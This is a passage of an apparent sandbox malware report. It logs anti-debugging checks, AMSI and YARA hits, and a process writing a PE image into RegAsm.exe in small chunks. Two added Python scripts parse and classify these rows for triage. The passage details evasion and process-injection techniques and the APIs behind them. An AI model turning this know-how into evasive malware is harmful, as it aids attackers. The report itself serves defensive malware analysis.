                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: SIWVID
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process queried: DebugPort
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Code function: 11_2_04C40DE6 rdtsc 11_2_04C40DE6
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049EAA2 BlockInput,0_2_0049EAA2
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00452622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00452622
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004242DE
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00444CE8 mov eax, dword ptr fs:[00000030h]0_2_00444CE8
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_0005DB60 mov eax, dword ptr fs:[00000030h]14_2_0005DB60
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00065FF2 mov eax, dword ptr fs:[00000030h]14_2_00065FF2
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00480B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00480B62
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                                    Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00452622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00452622
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0044083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044083F
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004409D5 SetUnhandledExceptionFilter,0_2_004409D5
                                    Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00440C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00440C21
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory allocated: page read and write | page guard
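The rows above are one hook event per line, the Windows API behind each event is not named, and the protector strings at the end of the VM-detection list sit among ordinary Amcache hardware artefacts (Oreans.vxd, Software\WinLicense and HARDWARE\ACPI\DSDT\VBOX__ are strings of Oreans' WinLicense/Themida runtime, which probes that VirtualBox registry key). The script below is an added triage example; it is not part of the Joe Sandbox report or of any binary in this analysis. It parses rows of this shape (a constructed excerpt is embedded), maps each event to the anti-analysis technique and the API it corresponds to, de-duplicates values and counts events per process. The API mapping is standard (HideFromDebugger is NtSetInformationThread with ThreadHideFromDebugger = 0x11, DebugPort is NtQueryInformationProcess with ProcessDebugPort = 7, NTICE/SICE/SIWVID are the SoftICE device names opened with CreateFile, fs:[30h] is the 32-bit PEB pointer in the TEB); the row separator and the regex are assumptions about this extraction.

```python
import re
from collections import defaultdict

# Constructed excerpt in the shape of the report's "Source: <process> | <behaviour>: <value>"
# rows; repeats are kept on purpose because the report lists one row per hook event.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: ollydbg",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: NTICE",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File opened: SICE",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Code function: 11_2_04C40DE6 rdtsc 11_2_04C40DE6",
    r"Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_0005DB60 mov eax, dword ptr fs:[00000030h]14_2_0005DB60",
    r"Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00452622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00452622",
    r"Source: rapes.exe, 0000000D.00000002.1315429749.0000000000233000.00000040.00000001.01000000.00000011.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicense",
]

# Assumed row layout: "Source: <path or dump id> | <behaviour>: <value>".
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|\s*(?P<beh>[^:]+):\s*(?P<val>.*)$")

# (behaviour column, regex over the value, technique label, API the event corresponds to).
# Order matters: several "Code function" rows are told apart by their value.
TECHNIQUES = [
    ("Thread information set", r"^HideFromDebugger$",
     "hide thread from debugger", "NtSetInformationThread(ThreadHideFromDebugger=0x11)"),
    ("Process queried", r"^DebugPort$",
     "debug port check", "NtQueryInformationProcess(ProcessDebugPort=7)"),
    ("Open window title or class name", r".",
     "debugger/monitor window scan", "FindWindow on tool window class or title"),
    ("File opened", r"^(NTICE|SICE|SIWVID)$",
     "SoftICE device probe", r"CreateFile(\\.\NTICE | \\.\SICE | \\.\SIWVID)"),
    ("Code function", r"\brdtsc\b",
     "rdtsc timing check", "rdtsc delta across a code stretch"),
    ("Code function", r"fs:\[00000030h\]",
     "direct PEB access", "mov eax, fs:[30h] (PEB.BeingDebugged / NtGlobalFlag)"),
    ("Code function", r"\bIsDebuggerPresent\b",
     "IsDebuggerPresent", "kernel32!IsDebuggerPresent"),
    ("Binary or memory string", r"Oreans\.vxd|WinLicense|DSDT\\VBOX__",
     "Oreans protector strings", "Themida/WinLicense runtime (VBOX__ DSDT key probe)"),
]


def process_name(src):
    """Reduce 'C:/.../rapes.exe' or 'rapes.exe, <dump id>.sdmp' to 'rapes.exe'."""
    return re.split(r"[\\/]", src.split(",")[0].strip())[-1]


def classify(line):
    """One row -> (process, technique, api, value), or None if the row does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc = process_name(m["src"])
    beh, val = m["beh"].strip(), m["val"].strip()
    for behaviour, pattern, technique, api in TECHNIQUES:
        if beh == behaviour and re.search(pattern, val):
            return proc, technique, api, val
    return proc, "unclassified " + beh.lower(), None, val


def triage(lines):
    """Per process -> per technique -> (event count, API, sorted distinct values)."""
    acc = defaultdict(lambda: defaultdict(lambda: [0, None, set()]))
    for line in lines:
        rec = classify(line)
        if rec is None:
            continue
        proc, technique, api, val = rec
        slot = acc[proc][technique]
        slot[0] += 1
        slot[1] = api
        slot[2].add(val)
    return {proc: {t: (n, api, sorted(vals)) for t, (n, api, vals) in techs.items()}
            for proc, techs in acc.items()}


if __name__ == "__main__":
    for proc, techs in triage(SAMPLE_LINES).items():
        print(proc)
        for technique, (n, api, vals) in techs.items():
            print(f"  {n:3d}x {technique:<30} {api}  values={vals}")
```

The count column is what separates a one-off CRT check (random.exe calling IsDebuggerPresent from its exception-filter setup) from a protector that polls DebugPort repeatedly from several threads, and the distinct-value list shows at a glance which tool windows and driver names are being hunted.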

                                    HIPS / PFW / Operating System Protection Evasion

                                    Source: Yara match | File source: amsi32_5708.amsi.csv, type: OTHER
                                    Source: Yara match | File source: amsi64_5740.amsi.csv, type: OTHER
                                    Source: Yara match | File source: Process Memory Space: mshta.exe PID: 5428, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5708, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: mshta.exe PID: 1992, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5740, type: MEMORYSTR
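The "Memory written" rows that follow list one event per write into the target, which hides the pattern: the bases advance in a fixed stride and only the first write is annotated with the 4D5A (MZ) marker. The script below is an added example, not part of the report or of the analysed binaries. It parses rows in that shape (a constructed excerpt of the rows below is embedded: the writer/target pairs, bases and marker are taken from the report, the row layout is assumed), groups them by writer and target, and reconstructs each injected region: start, number of writes, stride between writes, whether the stride is uniform, and whether the first chunk carries an MZ header. Over the rows below it shows Occupation.com writing a PE into RegAsm.exe from 0x960000 in steps of 0x64 (100) bytes, i.e. a loop of small writes rather than one bulk copy, and V0Bt74c.exe overwriting its own image at 0x400000; treating the stride as the chunk size is an inference, since the report does not give write lengths.

```python
import re
from collections import defaultdict

# Constructed excerpt of the report's "Memory written" rows (writer -> target, base,
# optional "value starts with" marker). Only the row layout is assumed.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory written: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe base: 400000 value starts with: 4D5A",
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000",
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960064",
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9600C8",
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96012C",
    r"Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960190",
]

# Assumed row layout: "Source: <writer> | Memory written: <target> base: <hex> [value starts with: <hex>]".
ROW_RE = re.compile(
    r"^Source:\s*(?P<writer>.+?)\s*\|\s*Memory written:\s*(?P<target>.+?)\s+base:\s*(?P<base>[0-9A-Fa-f]+)"
    r"(?:\s+value starts with:\s*(?P<magic>[0-9A-Fa-f]+))?\s*$"
)


def basename(path):
    return re.split(r"[\\/]", path.strip())[-1]


def reconstruct(rows):
    """Group write events by (writer, target) and describe each written region."""
    chunks = defaultdict(dict)  # (writer, target) -> {base: leading bytes or None}
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue
        key = (basename(m["writer"]), basename(m["target"]))
        base = int(m["base"], 16)
        magic = (m["magic"] or "").upper() or None
        # The report repeats the first base once with and once without the marker; keep the marker.
        if magic or base not in chunks[key]:
            chunks[key][base] = magic
    regions = []
    for (writer, target), by_base in chunks.items():
        bases = sorted(by_base)
        strides = sorted({b - a for a, b in zip(bases, bases[1:])})
        uniform = len(strides) == 1
        regions.append({
            "writer": writer,
            "target": target,
            "self_injection": writer == target,
            "start": bases[0],
            "last_base": bases[-1],
            "writes": len(bases),
            "strides": strides,
            "uniform_stride": uniform,
            # Bytes covered if every write is exactly one stride long (an inference).
            "span_bytes": bases[-1] - bases[0] + strides[0] if uniform else None,
            "mz_header": by_base[bases[0]] == "4D5A",
        })
    return regions


def describe(region):
    r = region
    kind = "self-overwrite" if r["self_injection"] else "cross-process write"
    stride = f"0x{r['strides'][0]:X}" if r["uniform_stride"] else "n/a"
    return (f"{r['writer']} -> {r['target']}: {kind}, {r['writes']} write(s) from "
            f"0x{r['start']:X}, stride {stride}, MZ header: {r['mz_header']}")


if __name__ == "__main__":
    for region in reconstruct(SAMPLE_ROWS):
        print(describe(region))
```

A cross-process region that starts with MZ and grows in a fixed small stride is the signature of a scripted WriteProcessMemory loop copying a payload image into a freshly started host; the self-overwrite at the image base of V0Bt74c.exe is the unpacking stub replacing its own PE in place.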
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000 value starts with: 4D5A
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Memory written: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe base: 400000 value starts with: 4D5A
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960000
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960064
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9600C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96012C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960190
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9601F4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960258
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9602BC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960320
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960384
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9603E8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96044C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9604B0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960514
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960578
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9605DC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960640
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9606A4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960708
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96076C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9607D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960834
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960898
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9608FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960960
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9609C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A28
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960A8C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960AF0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960B54
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960BB8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C1C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960C80
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960CE4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960D48
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960DAC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E10
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960E74
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960ED8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960F3C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 960FA0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961004
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961068
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9610CC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961130
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961194
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9611F8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96125C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9612C0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961324
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961388
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9613EC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961450
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9614B4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961518
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96157C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9615E0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961644
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9616A8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96170C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961770
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9617D4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961838
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96189C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961900
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961964
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9619C8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A2C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961A90
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961AF4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961B58
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961BBC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C20
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961C84
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961CE8
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961D4C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961DB0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E14
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961E78
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961EDC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961F40
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 961FA4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962008
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 96206C
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9620D0
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962134
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962198
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9621FC
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962260
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 9622C4
                                    Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Memory written: C:\Users\user\AppData\Local\Temp\789919\RegAsm.exe base: 962328
